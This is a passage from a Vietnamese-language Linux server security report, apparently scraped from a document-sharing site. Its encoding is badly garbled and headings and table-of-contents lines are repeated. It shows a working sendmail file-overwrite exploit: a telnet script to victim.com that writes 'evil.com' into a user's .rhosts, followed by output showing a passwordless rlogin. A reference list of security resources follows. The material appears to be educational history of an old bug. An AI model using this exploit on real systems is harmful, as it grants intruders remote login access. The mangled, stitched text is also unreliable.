OVERWRITE FILE S FiXED iN 5

Một phần của tài liệu Máy chủ Linux (Trang 71 - 74)

- u: Chuyển đổi Port UDP mặc định.

8)OVERWRITE FILE S FiXED iN 5

Những người dựng từ xa cú thể ghi đố lờn cỏc file trờn hệ thống mà khụng cần quyền root. Bug này đó được phỏt hiện trong Version 5.59 của Berkeley và cú thể là cả cỏc Version trước nữa:

% cat evil_sendmail

telnet victim.com 25 << EOSM rcpt to: /home/zen/.rhosts mail from: zen

data

random garbage .

rcpt to: /home/zen/.rhosts mail from: zen

data evil.com . quit EOSM

evil % /bin/sh evil_sendmail Trying 128.128.128.1 Connected to victim.com Escape character is '^]'.

Connection closed by foreign host. evil % rlogin victim.com -l zen Welcome to victim.com! victim %

TÀI LIỆU THAM KHẢO:

Tài liệu tham khảo chớnh dựng trong bỏo cỏo:

www.security.com.vn

Cỏc trung tõm giỳp đối phú tai nạn trờn Internet

http://www.cert.org http://www.first.org http://ciac.llnl.gov/

http://www.cert.dfn.de/eng/csir/europe/certs.html

Website về an toàn mỏy tớnh

http://www.cs.purdue.edu/coast/ http://www.linuxsecurity.com http://www.securityportal.com http://www.tno.nl/instit/fel/intern/wkinfsec.html http://www.icsa.net http://www.sans.org http://www.iss.com http://www.securityfocus.com Thụng tin về an toàn từ nhà cung cấp

http://www.calderasystems.com/news/security/ http://www.debian.org/security/

http://www.redhat.com/cgi-bin/support/

Một số sỏch về an toàn mỏy tớnh

Actually Useful Internet Security Techniques by Larry J. Hughes Jr.

Applied Cryptography: Protocols, Algorithms and Source Code in C by Bruce Schneier Building Internet Firewall by Brent Chapman & Elizabeth D. Zwicky

Cisco IOS Network Security by Mike Kaeo

Firewalls and Internet Security by Bill Cheswick & Steve Bellovin

Halting the Hacker: A practical Guide To Computer Security by Donal L. Pipkin Intrusion Detection: An Introduction to Internet Surveillance, Correlation, Traps, Trace Back and Response by Edward G. Amoroso

Intrusion Detection: Network Security Beyond the Firewall by Terry Escamilla Linux Security by Jonh S. Flowers

1.Lời núi đầu:

1.1 Những nguy cơ an ninh trờn linux1.2 Xem xột chớnh sỏch an ninh 1.2 Xem xột chớnh sỏch an ninh

Một phần của tài liệu Máy chủ Linux (Trang 71 - 74)

(73 trang)